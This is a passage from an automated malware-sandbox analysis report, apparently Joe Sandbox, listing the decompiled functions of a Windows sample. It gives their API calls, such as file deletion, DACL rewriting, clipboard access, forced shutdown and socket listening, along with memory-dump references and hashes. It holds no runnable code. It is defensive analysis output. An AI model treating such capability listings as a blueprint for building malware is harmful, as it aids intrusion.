                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001DED0C
                                                                                                                              • GetFocus.USER32 ref: 001DED1C
                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 001DED27
                                                                                                                              • _memset.LIBCMT ref: 001DEE52
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 001DEE7D
                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 001DEE9D
                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 001DEEB0
                                                                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 001DEEE4
                                                                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 001DEF2C
                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001DEF64
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 001DEF99
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3616455698-4108050209
                                                                                                                              • Opcode ID: 52bbdd37ca1516428a53e28fe9485419d6640d99b8fc2db23f2356400f502cd5
                                                                                                                              • Instruction ID: 27af89df66113887ea34353803d02f4dd84c6ab87dc6af46e2e2ec458a884029
                                                                                                                              • Opcode Fuzzy Hash: 52bbdd37ca1516428a53e28fe9485419d6640d99b8fc2db23f2356400f502cd5
                                                                                                                              • Instruction Fuzzy Hash: 09817C71208301AFDB10EF14D884A6BBBE5FF98355F04092EF9999B391D730D945CBA2
                                                                                                                              Function 001AB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
                                                                                                                                • Part of subcall function 001AB8E7: GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
                                                                                                                                • Part of subcall function 001AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
                                                                                                                                • Part of subcall function 001AB8E7: RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
                                                                                                                                • Part of subcall function 001AB982: GetProcessHeap.KERNEL32(00000008,001AB3E1,00000000,00000000,?,001AB3E1,?), ref: 001AB98E
                                                                                                                                • Part of subcall function 001AB982: RtlAllocateHeap.NTDLL(00000000,?,001AB3E1), ref: 001AB995
                                                                                                                                • Part of subcall function 001AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001AB3E1,?), ref: 001AB9A6
                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001AB3FC
                                                                                                                              • _memset.LIBCMT ref: 001AB411
                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001AB430
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB441
                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001AB47E
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001AB49A
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB4B7
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001AB4C6
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 001AB4CD
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001AB4EE
                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 001AB4F5
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001AB526
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001AB54C
                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001AB560
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2347767575-0
                                                                                                                              • Opcode ID: fa97ddae4aafbc5cea9738ea52133b5eb5e51cb01c214686ddcb624ea4f2bf6f
                                                                                                                              • Instruction ID: b8f1801acd11d1d4807090b6e295b363ff38c01f5f34c5ab7cab2ac3e3231a9d
                                                                                                                              • Opcode Fuzzy Hash: fa97ddae4aafbc5cea9738ea52133b5eb5e51cb01c214686ddcb624ea4f2bf6f
                                                                                                                              • Instruction Fuzzy Hash: 7C513A75904249AFDF00DFA4EC95AFEBB79FF06300F048129F915A7292DB359A45CB60
                                                                                                                              Function 001B6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
                                                                                                                                • Part of subcall function 001B7C0C: GetFileAttributesW.KERNEL32(?,001B6A7B), ref: 001B7C0D
                                                                                                                              • _wcscat.LIBCMT ref: 001B6E7E
                                                                                                                              • __wsplitpath.LIBCMT ref: 001B6E99
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001B6EAE
                                                                                                                              • _wcscpy.LIBCMT ref: 001B6EDD
                                                                                                                              • _wcscat.LIBCMT ref: 001B6EEF
                                                                                                                              • _wcscat.LIBCMT ref: 001B6F01
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 001B6F0E
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001B6F22
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001B6F3D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 2643075503-1173974218
                                                                                                                              • Opcode ID: 61e5c54b963b771a8dc7d6f638131b0a91c4ee023bbad23be388f62d54eb7139
                                                                                                                              • Instruction ID: bd7f63290aa9c7bea32b5d56a32021ebf9de0e7679913fd073e11e9cfbc70ec1
                                                                                                                              • Opcode Fuzzy Hash: 61e5c54b963b771a8dc7d6f638131b0a91c4ee023bbad23be388f62d54eb7139
                                                                                                                              • Instruction Fuzzy Hash: BB21CEB2408345BEC611EBA0D8849EBBBDCAFA9214F044A5EF5D4C3042EB34D64D87A2
                                                                                                                              Function 00175D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                              • API String ID: 0-2893523900
                                                                                                                              • Opcode ID: 50c0d3672ffe6b33bd755b6eb99faaaa65baa2451d571ac1b2ecac19d44ca150
                                                                                                                              • Instruction ID: eae8d1947284003b5a8936075015ece4cc819abcd2e4615246961cc7217f458d
                                                                                                                              • Opcode Fuzzy Hash: 50c0d3672ffe6b33bd755b6eb99faaaa65baa2451d571ac1b2ecac19d44ca150
                                                                                                                              • Instruction Fuzzy Hash: 4862A3B1E00619DBDF28CF99C8807BEB7B5BF48310F15816AE959EB281D7749E41CB90
                                                                                                                              Function 001C7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1737998785-0
                                                                                                                              • Opcode ID: e7b5d10e12a85acc605157d85d17241e20a2941706d5399a94b437de1a607802
                                                                                                                              • Instruction ID: d6ce6b7feab5ee76d584b1995c4bb831e87e54d777d9f8c76ddc0cb6eab61ad7
                                                                                                                              • Opcode Fuzzy Hash: e7b5d10e12a85acc605157d85d17241e20a2941706d5399a94b437de1a607802
                                                                                                                              • Instruction Fuzzy Hash: 19218B31244211AFDB05AF65EC59F7DBBA9EF64720F008019F90ADB2A1DB70E980DF91
                                                                                                                              Function 001C24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001C24F6
                                                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001C2526
                                                                                                                              • _wcscmp.LIBCMT ref: 001C253A
                                                                                                                              • _wcscmp.LIBCMT ref: 001C2555
                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001C25F3
                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001C2609
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 713712311-438819550
                                                                                                                              • Opcode ID: 1e5475f73576960a71ef99e20ab67278b6f34422b212129844b72435853f3893
                                                                                                                              • Instruction ID: 8e7d5c2feb1c8dc2456f0426d3d82f4a759811087d819c52b8f19a0eb078af33
                                                                                                                              • Opcode Fuzzy Hash: 1e5475f73576960a71ef99e20ab67278b6f34422b212129844b72435853f3893
                                                                                                                              • Instruction Fuzzy Hash: 3B415C7190421AAFCF15DFA4CC59FEEBBB4BF29310F10445AE815A2191E734DA94CFA0
                                                                                                                              Function 00178530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: a1d843ed92a146b356631b9865471220485a4843621ba20420c6204086a2512c
                                                                                                                              • Instruction ID: 62b744b4cc9c80ce954afa1e6821d2c085918b9e9ee0c21a67544ee4ffabe1fe
                                                                                                                              • Opcode Fuzzy Hash: a1d843ed92a146b356631b9865471220485a4843621ba20420c6204086a2512c
                                                                                                                              • Instruction Fuzzy Hash: E9128F70A00609EFDF18DFA5D995AAEB7F9FF58300F208569E40AE7250EB35AD11CB50
                                                                                                                              Function 001DEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                                • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              • ReleaseCapture.USER32 ref: 001DEB1A
                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 001DEBC2
                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001DEBD5
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 001DECAE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                              • API String ID: 973565025-2107944366
                                                                                                                              • Opcode ID: 163f192ce8841a3844edd3e5d426a5814e113a0c0fa0f1e9d58c39b7c2cf925b
                                                                                                                              • Instruction ID: ad44f05062bcdee6f2f899aed32b95d799dcea64214244e67da9f85ced99012d
                                                                                                                              • Opcode Fuzzy Hash: 163f192ce8841a3844edd3e5d426a5814e113a0c0fa0f1e9d58c39b7c2cf925b
                                                                                                                              • Instruction Fuzzy Hash: 0C518971214304AFE700EF24EC96FAA7BE5BB98705F00491AF5859B2E2DB709954CB62
                                                                                                                              Function 001B82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001ABEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001ABF0F
                                                                                                                                • Part of subcall function 001ABEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001ABF3C
                                                                                                                                • Part of subcall function 001ABEC3: GetLastError.KERNEL32 ref: 001ABF49
                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 001B830C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                              • String ID: $@$SeShutdownPrivilege
                                                                                                                              • API String ID: 2234035333-194228
                                                                                                                              • Opcode ID: 0ec0fad98b1633faccf13bb77a2a089c4e72789a26e20ed63e84d89b497d47c6
                                                                                                                              • Instruction ID: bcd56fbc52ec3db2975b779977896e2edc184ac653d1ef8f66afba63e02a7500
                                                                                                                              • Opcode Fuzzy Hash: 0ec0fad98b1633faccf13bb77a2a089c4e72789a26e20ed63e84d89b497d47c6
                                                                                                                              • Instruction Fuzzy Hash: 54018475654211AAE76866789C8ABFB72ACBB11F80F180424F943D51E2DF64DC00C1A4
                                                                                                                              Function 001C91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001C9235
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9244
                                                                                                                              • bind.WS2_32(00000000,?,00000010), ref: 001C9260
                                                                                                                              • listen.WS2_32(00000000,00000005), ref: 001C926F
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9289
                                                                                                                              • closesocket.WS2_32(00000000), ref: 001C929D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1279440585-0
                                                                                                                              • Opcode ID: de4c02d8d906aba2c09229cfe712b88d3e17ff500b9809ed607d45f43435c708
                                                                                                                              • Instruction ID: 10efa30071f72f347532563c20f9536cf3e848f8b31c59b44a2f80348ca6736b
                                                                                                                              • Opcode Fuzzy Hash: de4c02d8d906aba2c09229cfe712b88d3e17ff500b9809ed607d45f43435c708
                                                                                                                              • Instruction Fuzzy Hash: 81217E35600200AFCB14EF64D889FBEB7A9AF54728F10815DF996AB691CB70ED41CB91
                                                                                                                              Function 00176670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: hN"$tM"
                                                                                                                              • API String ID: 4104443479-1199129293
                                                                                                                              • Opcode ID: 90f9f0e32c25521491d18a2e0246c9db8766887cde6c5b8a1af78f1c8687912c
                                                                                                                              • Instruction ID: f42ce09956a445b1364561a8f739bb7b8d5867254fe842b324a2924eef91a126
                                                                                                                              • Opcode Fuzzy Hash: 90f9f0e32c25521491d18a2e0246c9db8766887cde6c5b8a1af78f1c8687912c
                                                                                                                              • Instruction Fuzzy Hash: 64A27B75E00619CFDB28CF58C8806ADBBB1FF48314F2581AAE959AB391D7749E81CF50
                                                                                                                              Function 0017A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • _memmove.LIBCMT ref: 001E3020
                                                                                                                              • _memmove.LIBCMT ref: 001E3135
                                                                                                                              • _memmove.LIBCMT ref: 001E31DC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
